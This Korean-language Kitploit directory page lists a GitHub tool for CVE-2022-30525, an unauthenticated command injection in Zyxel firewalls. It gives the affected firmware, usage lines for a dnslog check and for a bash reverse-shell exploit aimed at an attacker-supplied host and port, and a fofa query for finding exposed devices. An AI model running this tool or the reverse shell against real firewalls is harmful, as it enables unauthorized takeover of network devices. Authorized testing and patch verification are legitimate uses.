Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-30525 — CVE-2022-30525 Zyxel 방화벽 명령 주입 취약점 POC&EXPC | Kitploit
도구/GitHubGitHub/west9b/cve-2022-30525
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubwest9b/cve-2022-30525

CVE-2022-30525

CVE-2022-30525 Zyxel 방화벽 명령 주입 취약점 POC&EXPC

저장소 보기
12334년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-30525 Zyxel 방화벽 명령 주입 취약점

CVE-2022-30525 POC&EXP

작성자:160team.west9B

승인된 상태에서 보안 연구원만 사용하도록 제한됩니다. 사이버 보안법을 준수하십시오. 발생하는 모든 문제에 대한 책임은 사용자 본인에게 있으며 작성자와 무관합니다.

01-기본 소개

2022년 5월 12일, Zyxel(合勤)은 방화벽 장치에서 인증되지 않은 원격 명령 주입 취약점(CVE-2022-30525)을 수정하는 보안 공지를 발표했습니다. 이 취약점의 CVSS 점수는 9.8입니다. 이 취약점은 일부 Zyxel 방화벽 버전의 CGI 프로그램에 존재하며, 인증 없이 영향을 받는 장치에서 임의의 명령을 실행할 수 있습니다.

영향 범위:

ATP 시리즈 펌웨어: 5.10-5.21 Patch 1

VPN 시리즈 펌웨어: 4.60-5.21 Patch 1

USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1

USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1

02-사용 설명

usage_poc: ./cve-2022-30525 -m poc -u url

usage_exp: ./cve-2022-30525 -m exp -u url -lhost ip -lport port

1. POC

이 취약점은 명령 실행 결과를 반환하지 않으므로, POC는 dnslog API에 검증 요청을 보냅니다. dnslog에 요청이 있으면 취약점이 존재하는 것입니다. 네트워크 지연으로 인한 오탐을 방지하기 위해 DNSLOG 검증 요청은 10초 지연됩니다.

usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/

2. exp

exp는 bash 리버스 셸입니다. -m exp 뒤에 vps ip와 포트를 지정하십시오.

**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

스크린샷

Image text Image text

참조

https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

fofa

title="USG FLEX xx"

도구 다운로드